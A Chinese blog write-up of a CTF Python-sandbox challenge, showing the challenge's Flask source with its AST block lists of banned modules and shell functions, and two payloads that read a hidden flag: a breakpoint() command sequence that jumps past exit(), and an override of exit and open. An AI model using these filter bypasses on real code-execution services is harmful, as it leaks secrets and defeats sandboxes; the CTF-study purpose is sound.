利用breakpoint()在python沙箱中实现代码跳转和变量读取

利用breakpoint()在python沙箱中实现代码跳转和变量读取:

breakpoint():用来在调试器中控制代码执行流程,commands参数可以自动一次传入操作指令

参数:

      n:在调试器中,n 命令会让程序执行当前行并跳到下一行。如果你连续多次使用 n,就会跳过多行代码。不过注意,它是按line事件(执行到新的

               一行代码)和在当前frame的return事件(函数返回时)以及frame暂停,比如return会暂停两次并返回调用者那一行

      j:命令允许你跳转到指定行号,不过注意在沙箱中是在生成的临时脚本文件中跳转

      n:继续执行接下来的一行代码

      p:打印变量的值

利用这些我们可以在python沙箱中实现暂停程序,任意代码跳转和变量打印。

例题:

import ast
import subprocess
import tempfile
import os
import time
import threading
from flask import Flask, render_template, request, jsonify
from flask_socketio import SocketIO, emit
import secrets

app = Flask(__name__)
app.config['SECRET_KEY'] = os.environ.get('SECRET_KEY', secrets.token_hex(32))
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024
socketio = SocketIO(app, cors_allowed_origins="*")

active_processes = {}

class PythonRunner:

    def __init__(self, code, args=""):
        self.code = code
        self.args = args
        self.process = None
        self.output = []
        self.running = False
        self.temp_file = None
        self.start_time = None

    def validate_code(self):
        try:
            if len(self.code) > int(os.environ.get('MAX_CODE_SIZE', 1024)):
                return False, "代码过长"

            tree = ast.parse(self.code)

            banned_modules = ['os', 'sys', 'subprocess', 'shlex', 'pty', 'popen', 'shutil', 'platform', 'ctypes', 'cffi', 'io', 'importlib']

            banned_functions = ['eval', 'exec', 'compile', 'input', '__import__', 'open', 'file', 'execfile', 'reload']

            banned_methods = ['system', 'popen', 'spawn', 'execv', 'execl', 'execve', 'execlp', 'execvp', 'chdir', 'kill', 'remove', 'unlink', 'rmdir', 'mkdir', 'makedirs', 'removedirs', 'read', 'write', 'readlines', 'writelines', 'load', 'loads', 'dump', 'dumps', 'get_data', 'get_source', 'get_code', 'load_module', 'exec_module']

            dangerous_attributes = ['__class__', '__base__', '__bases__', '__mro__', '__subclasses__', '__globals__', '__builtins__', '__getattribute__', '__getattr__', '__setattr__', '__delattr__', '__call__']

            for node in ast.walk(tree):
                if isinstance(node, ast.Import):
                    for name in node.names:
                        if name.name in banned_modules:
                            return False, f"禁止导入模块: {name.name}"

                elif isinstance(node, ast.ImportFrom):
                    if node.module in banned_modules:
                        return False, f"禁止从模块导入: {node.module}"

                elif isinstance(node, ast.Call):
                    if isinstance(node.func, ast.Name):
                        if node.func.id in banned_functions:
                            return False, f"禁止调用函数: {node.func.id}"

                    elif isinstance(node.func, ast.Attribute):
                        if node.func.attr in banned_methods:
                            return False, f"禁止调用方法: {node.func.attr}"

                    elif isinstance(node.func, ast.Name):
                        if node.func.id == 'open':
                            return False, "禁止文件操作"

                elif isinstance(node, ast.With):
                    for item in node.items:
                        if isinstance(item.context_expr, ast.Call):
                            if isinstance(item.context_expr.func, ast.Name):
                                if item.context_expr.func.id == 'open':
                                    return False, "禁止文件操作"

                elif isinstance(node, ast.Attribute):
                    if node.attr in dangerous_attributes:
                        if isinstance(node.value, ast.Call) or isinstance(node.value, ast.Name):
                            return False, f"禁止访问危险属性: {node.attr}"

                elif isinstance(node, ast.Subscript):
                    if isinstance(node.value, ast.Attribute):
                        if node.value.attr == '__subclasses__':
                            return False, "禁止访问__subclasses__"

            return True, "代码验证通过"

        except SyntaxError as e:
            return False, f"语法错误: {str(e)}"
        except Exception as e:
            return False, f"验证错误: {str(e)}"

    def create_script(self):
        try:
            self.temp_file = tempfile.NamedTemporaryFile(
                mode='w', 
                suffix='.py', 
                dir='/tmp',
                delete=False
            )

            wrapper = """
import sys

def safe_exec():
    try:
{indented_code}
        return 0
    except SystemExit as e:
        return e.code if isinstance(e.code, int) else 0
    except Exception as e:
        print(f"执行错误: {{e}}", file=sys.stderr)
        return 1

sys.argv = ['sandbox.py'] + {args}

exit_code = safe_exec()

exit()
# Hey bro, don't forget to remove this before release!!!
import os
import sys

flag_content = os.environ.get('GZCTF_FLAG', '')
os.environ['GZCTF_FLAG'] = ''

try:
    with open('/flag.txt', 'w') as f:
        f.write(flag_content)
except:
    pass
"""

            indented_code = 'n'.join(['        ' + line for line in self.code.split('n')])

            full_code = wrapper.format(
                indented_code=indented_code,
                args=str(self.args.split() if self.args else [])
            )

            self.temp_file.write(full_code)
            self.temp_file.flush()
            os.chmod(self.temp_file.name, 0o755)

            return self.temp_file.name

        except Exception as e:
            raise Exception(f"创建脚本失败: {str(e)}")

    def run(self):
        try:
            is_valid, message = self.validate_code()
            if not is_valid:
                self.output.append(f"验证失败: {message}")
                return False

            script_path = self.create_script()

            cmd = ['python', script_path]
            if self.args:
                cmd.extend(self.args.split())

            self.process = subprocess.Popen(
                cmd,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                stdin=subprocess.PIPE,
                text=True,
                bufsize=1,
                universal_newlines=True
            )

            self.running = True
            self.start_time = time.time()

            def read_output():
                while self.process and self.process.poll() is None:
                    try:
                        line = self.process.stdout.readline()
                        if line:
                            self.output.append(line.strip())
                            socketio.emit('output', {'data': line})
                    except:
                        break

                stdout, stderr = self.process.communicate()
                if stdout:
                    for line in stdout.split('n'):
                        if line.strip():
                            self.output.append(line.strip())
                            socketio.emit('output', {'data': line})
                if stderr:
                    for line in stderr.split('n'):
                        if line.strip():
                            self.output.append(f"错误: {line.strip()}")
                            socketio.emit('output', {'data': f"错误: {line}"})

                self.running = False
                socketio.emit('process_end', {'pid': self.process.pid})

            thread = threading.Thread(target=read_output)
            thread.daemon = True
            thread.start()

            return True

        except Exception as e:
            self.output.append(f"运行失败: {str(e)}")
            return False

    def send_input(self, data):
        if self.process and self.process.poll() is None:
            try:
                self.process.stdin.write(data + 'n')
                self.process.stdin.flush()
                return True
            except:
                return False
        return False

    def terminate(self):
        if self.process and self.process.poll() is None:
            self.process.terminate()
            self.process.wait(timeout=5)
            self.running = False

            if self.temp_file:
                try:
                    os.unlink(self.temp_file.name)
                except:
                    pass
            return True
        return False

@app.route('/')
def index():
    return render_template('index.html')

@app.route('/api/run', methods=['POST'])
def run_code():
    data = request.json
    code = data.get('code', '')
    args = data.get('args', '')

    runner = PythonRunner(code, args)

    pid = secrets.token_hex(8)
    active_processes[pid] = runner

    success = runner.run()

    if success:
        return jsonify({
            'success': True,
            'pid': pid,
            'message': '进程已启动'
        })
    else:
        return jsonify({
            'success': False,
            'message': '启动失败'
        })

@app.route('/api/terminate', methods=['POST'])
def terminate_process():
    data = request.json
    pid = data.get('pid')

    if pid in active_processes:
        active_processes[pid].terminate()
        del active_processes[pid]
        return jsonify({'success': True})

    return jsonify({'success': False, 'message': '进程不存在'})

@app.route('/api/send_input', methods=['POST'])
def send_input():
    data = request.json
    pid = data.get('pid')
    input_data = data.get('input', '')

    if pid in active_processes:
        success = active_processes[pid].send_input(input_data)
        return jsonify({'success': success})

    return jsonify({'success': False})

@socketio.on('connect')
def handle_connect():
    emit('connected', {'data': 'Connected'})

@socketio.on('disconnect')
def handle_disconnect():
    pass

if __name__ == '__main__':
    socketio.run(app, host='0.0.0.0', port=5000, debug=False, allow_unsafe_werkzeug=True)
直接给出payload:
breakpoint(commands=['n']*3+['j 20']+['n']*3+['p flag_content'])
breakpoint(commands=['n','n','n','j 20','n','n','n','p flag_content']) # 这个也是可以的zwz
下面对payload给出解释:

第一个n:刚执行完 breakpoint(...),还没真的 return,触发line事件暂停,停在return 0那里

第二个n:执行return,触发return事件暂停。此时还没真正返回。

第三个n:真正返回,并且触发line事件暂停,这时已经来到函数外部,停在exit()那里

j 20:跳到临时脚本文件的第20行,即import os

然后三个n:执行完flag_content = os.environ.get('GZCTF_FLAG', '')停在os.environ['GZCTF_FLAG'] = ''前,此时flag已经写入变量

p flag_content:打印变量,得到flag

附一个对临时脚本文件的标号:

db18516e-e583-4493-be85-e3e97abed077

第二种打法:

上下文管理器是什么:一个对象只要实现了 __enter____exit__ 两个方法,就能被 with 使用

ban的东西很多,那么尝试污染exit()为空,并且污染withopen(/flag.txt,w)asf:的逻辑直接让flag回显⽽不是写⼊⽂件。不过with的象open要是一个上下文管理器

payload:

global exit, open
//全局污染exit和open

exit = lambda *a, **k: None
//把名字 exit 绑定到一个新的可调用对象(这里是 lambda 产生的匿名函数),接受任意数量的位置参数 *a,接受任意数量的关键字参数 **k

class _Leak:
//自定义一个类

    def __enter__(self):        
        return self
//当写 with open(...) as f: 时,会先求值 open(...) 得到一个对象(称为 context manager),调用它的 __enter__()时,__enter__() 的返回值会绑定给 as f 里的 f

    def __exit__(self, *exc):
        return False 
//__exit__ 也是上下文管理器协议的一部分,with 语句结束时一定会调用它。
//标准签名通常是 __exit__(self, exc_type, exc, tb):表示 with 块里是否发生异常以及异常信息。
//这里用 *exc 接收任意参数,是一种“我不关心具体异常细节,但我愿意接收它”的写法
//返回值含义:
//返回 True:表示“异常已被我处理/吞掉”,外层不会再抛出
//返回 False:表示“不吞异常”,如果块内有异常仍会继续向外抛

    def write(self, s):
        print("aaaflag批发:", repr(s))
//提供write()方法,将接受到的参数打印到标准输出

def open(*a, **k):
    return _Leak()
//定义open返回我们刚刚定义的类,*a, **k 的作用同上:兼容各种调用参数。

print("inex")
//测试代码,说明代码正常跑完了
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇